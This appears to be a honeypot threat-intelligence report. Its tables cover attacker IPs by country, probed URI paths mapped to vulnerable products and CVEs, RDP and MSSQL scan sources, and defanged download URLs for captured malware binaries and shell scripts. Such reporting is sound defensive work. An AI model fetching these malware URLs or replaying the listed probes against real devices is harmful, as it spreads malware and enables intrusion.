169[.]62[.]49[.]122 United States 9 件 Link
45[.]146[.]253[.]35 Germany 6 件 Link
77[.]247[.]108[.]119 Estonia 4 件 Link
62[.]210[.]69[.]154 France 2 件 Link
2[.]183[.]214[.]32 Iran 2 件 Link
94[.]200[.]76[.]222 United Arab Emirates 1 件 Link
137[.]59[.]49[.]9 Bangladesh 1 件 Link
162[.]243[.]133[.]116 United States 1 件 Link
95[.]47[.]50[.]189 Czechia 1 件 Link
14[.]102[.]46[.]66 India 1 件 Link
88[.]252[.]141[.]198 Turkey 1 件 Link
202[.]96[.]99[.]82 China 1 件 Link
123[.]209[.]254[.]61 Australia 1 件 Link
80[.]80[.]138[.]214 Bulgaria 1 件 Link
195[.]142[.]115[.]111 Turkey 1 件 Link
202[.]29[.]214[.]57 Thailand 1 件 Link
185[.]232[.]65[.]226 Romania 1 件 Link
183[.]136[.]225[.]45 China 1 件 Link
115[.]238[.]44[.]237 China 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
185[.]128[.]41[.]50 Switzerland 180 件 Link
169[.]62[.]49[.]122 United States 9 件 Link
45[.]146[.]253[.]35 Germany 6 件 Link
77[.]247[.]108[.]119 Estonia 4 件 Link
62[.]210[.]69[.]154 France 2 件 Link
2[.]183[.]214[.]32 Iran 2 件 Link
94[.]200[.]76[.]222 United Arab Emirates 1 件 Link
137[.]59[.]49[.]9 Bangladesh 1 件 Link
162[.]243[.]133[.]116 United States 1 件 Link
95[.]47[.]50[.]189 Czechia 1 件 Link
14[.]102[.]46[.]66 India 1 件 Link
88[.]252[.]141[.]198 Turkey 1 件 Link
202[.]96[.]99[.]82 China 1 件 Link
123[.]209[.]254[.]61 Australia 1 件 Link
80[.]80[.]138[.]214 Bulgaria 1 件 Link
195[.]142[.]115[.]111 Turkey 1 件 Link
202[.]29[.]214[.]57 Thailand 1 件 Link
185[.]232[.]65[.]226 Romania 1 件 Link
183[.]136[.]225[.]45 China 1 件 Link
115[.]238[.]44[.]237 China 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
/rs-status Mongodb - -

02 WOWHoneypot

URI Path Target CVE Memo
- - - -

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
- - - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 196427 件
/ - - 394 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 69 件
/tmpfs/auto[.]jpg IP camera - 30 件
login[.]cgi D-Link Router - 18 件
sip:nm Session Initiation Protocol - 15 件
/nice - - 14 件
/ws/v1/cluster/apps/new-application Apache Hadoop - 14 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 9 件
/home[.]asp ASP file - 8 件
/login[.]cgi D-Link Router - 8 件
/vpn/index[.]html - - 8 件
/cgi-bin/luci CGI - 8 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 8 件
/remote/login VPN Login - 8 件
/index[.]asp index - 8 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 8 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 8 件
/server-info Apache - 7 件
/api api - 6 件
/cgi CGI - 6 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 5 件
/version - - 5 件
SERVER - - 5 件
/admin/assets/js/views/login[.]js FreePBX - 4 件
/jmx JMX - 4 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 4 件
hxxp://123[.]125[.]114[.]144/ Unauthorized relay - 3 件
/live/CPEManager/AXCampaignManager/delet
e_cpes_by_ids
 Zyxel CNM SecuManager - 3 件
hxxp://aandetransportandrecovery[.]co[.]
uk/
 Unauthorized relay - 3 件
/jars Unknown - 2 件
/service/extdirect Sonatype Nexus Repository Manager CVE-2019-7238 2 件
rtsp://160[.]16[.]145[.]183:554 Real Time Streaming Protocol - 1 件
/hudson Unknown - 1 件
/setup/index[.]jsp Openfire Server 3.6.0a - 1 件
/solr/admin/info/system Apache Solr - 1 件
/v1[.]16/version - - 1 件
/install[.]php php - 1 件
/rs-status New - 1 件
/status - 2020/2/15 1 件
/tmUnblock[.]cgi Linksys E-series - 1 件
/_search Elasticsearch - 1 件
rtsp://160[.]16[.]145[.]183:554/12 Real Time Streaming Protocol - 1 件
rtsp://160[.]16[.]145[.]183:44554/12 Real Time Streaming Protocol - 1 件
/info - - 1 件
hxxp://example[.]com/ Unauthorized relay - 1 件
/stats - - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/manager/html Apache Tomcat Manager - 180 件
/ - - 35 件
/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 6 件
/admin/assets/js/views/login[.]js FreePBX - 4 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 2 件
/boaform/admin/formPing Administrator - 1 件
/hudson Unknown - 1 件
/HNAP1/ Linksys Router D-Link Router 1 件
ip[.]ws[.]126[.]net:443 Unauthorized Relay - 1 件
/tmpfs/auto[.]jpg IP camera - 1 件
hxxp://example[.]com/ Unauthorized relay - 1 件
/home[.]asp ASP file - 1 件
/login[.]cgi D-Link Router - 1 件
/vpn/index[.]html - - 1 件
/cgi-bin/luci CGI - 1 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 1 件
/remote/login VPN Login - 1 件
/index[.]asp index - 1 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 1 件
/cdn-cgi/trace Cloudflare - 1 件
/portal/redlion Unknown - 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/ - - 11 件
/admin/assets/js/views/login[.]js FreePBX - 4 件
/home[.]asp ASP file - 4 件
/login[.]cgi D-Link Router - 4 件
/vpn/index[.]html - - 3 件
/cgi-bin/luci CGI - 3 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 3 件
/remote/login VPN Login - 3 件
/index[.]asp index - 3 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 3 件
/dns-query DNS over HTTPS - 1 件
/ajax - - 1 件
/data[.]php - - 1 件

Malware

  1. Honeytrap
Malware Count
No Malware 197095 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 16 件
hxxp://51[.]255[.]170[.]237/pandora[.]mips 12 件
hxxp://178[.]33[.]64[.]107/arm7 5 件
hxxp://45[.]95[.]168[.]127/bins/911[.]mips 3 件
hxxp://212[.]114[.]52[.]128/arm7 2 件
hxxp://192[.]3[.]45[.]185/arm7 1 件
hxxp://19ce033f[.]ngrok[.]io/arm7 1 件
hxxp://147[.]75[.]67[.]253/bins/enigma[.]mpsl 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
3389 95[.]47[.]248[.]84 Ukraine 79 件 Link
3389 191[.]253[.]39[.]7 Brazil 43 件 Link
3389 81[.]13[.]124[.]110 Russia 12 件 Link
22040 45[.]141[.]87[.]27 Russia 10 件 Link
27945 45[.]141[.]87[.]27 Russia 10 件 Link
2178 45[.]141[.]87[.]27 Russia 10 件 Link
27644 45[.]141[.]87[.]27 Russia 10 件 Link
29119 45[.]141[.]87[.]27 Russia 10 件 Link
29241 45[.]141[.]87[.]27 Russia 10 件 Link
29551 45[.]141[.]87[.]27 Russia 10 件 Link
23191 45[.]141[.]87[.]27 Russia 10 件 Link
23785 45[.]141[.]87[.]27 Russia 10 件 Link
17356 45[.]141[.]87[.]27 Russia 10 件 Link
23264 45[.]141[.]87[.]27 Russia 10 件 Link
23561 45[.]141[.]87[.]27 Russia 10 件 Link
22561 45[.]141[.]87[.]27 Russia 10 件 Link
24336 45[.]141[.]87[.]27 Russia 10 件 Link
23259 45[.]141[.]87[.]27 Russia 10 件 Link
28421 45[.]141[.]87[.]27 Russia 10 件 Link
29812 45[.]141[.]87[.]27 Russia 10 件 Link

Port

Port Count
3389 228 件
3390 21 件
23643 16 件
23788 16 件
23584 16 件
18006 16 件
24688 16 件
17135 16 件
20000 15 件
23256 15 件
17791 15 件
23588 15 件
23456 15 件
24351 15 件
23653 15 件
19644 15 件
23489 15 件
23662 15 件
23660 15 件
17602 15 件

IP

IP Country Count AbuseIPDB
45[.]141[.]87[.]27 Russia 36759 件 Link
185[.]202[.]1[.]19 France 11688 件 Link
185[.]202[.]1[.]217 France 3423 件 Link
185[.]158[.]113[.]43 Russia 2156 件 Link
185[.]202[.]2[.]120 France 914 件 Link
185[.]202[.]1[.]10 France 835 件 Link
5[.]252[.]193[.]112 Russia 630 件 Link
185[.]202[.]1[.]189 France 172 件 Link
5[.]188[.]206[.]38 United States 88 件 Link
95[.]47[.]248[.]84 Ukraine 79 件 Link
185[.]202[.]1[.]85 France 70 件 Link
185[.]202[.]0[.]25 United Kingdom 69 件 Link
185[.]202[.]0[.]27 United Kingdom 58 件 Link
195[.]54[.]167[.]115 Russia 47 件 Link
185[.]209[.]0[.]15 Latvia 45 件 Link
191[.]253[.]39[.]7 Brazil 43 件 Link
185[.]153[.]199[.]217 Russia 33 件 Link
185[.]209[.]0[.]71 Latvia 28 件 Link
185[.]202[.]2[.]132 France 13 件 Link
81[.]13[.]124[.]110 Russia 12 件 Link

Port 1433

IP Country Count AbuseIPDB
58[.]58[.]226[.]122 China 49035 件 Link
111[.]246[.]2[.]73 Taiwan 13248 件 Link
109[.]248[.]66[.]112 Russia 13148 件 Link
114[.]41[.]215[.]58 Taiwan 3012 件 Link
103[.]62[.]233[.]18 Pakistan 3010 件 Link
175[.]114[.]50[.]74 South Korea 3007 件 Link
95[.]106[.]72[.]80 Russia 3007 件 Link
138[.]97[.]119[.]222 Brazil 3006 件 Link
67[.]69[.]26[.]93 Canada 3005 件 Link
42[.]114[.]248[.]207 Vietnam 3004 件 Link
160[.]20[.]109[.]159 Turkey 3003 件 Link
88[.]253[.]239[.]154 Turkey 3000 件 Link
201[.]24[.]82[.]11 Brazil 2999 件 Link
110[.]145[.]74[.]118 Australia 2999 件 Link
190[.]201[.]117[.]64 Venezuela 2999 件 Link
189[.]2[.]112[.]130 Brazil 2998 件 Link
182[.]71[.]101[.]42 India 2175 件 Link
197[.]45[.]172[.]17 Egypt 1949 件 Link
179[.]95[.]49[.]242 Brazil 1728 件 Link
201[.]201[.]187[.]94 Costa Rica 1430 件 Link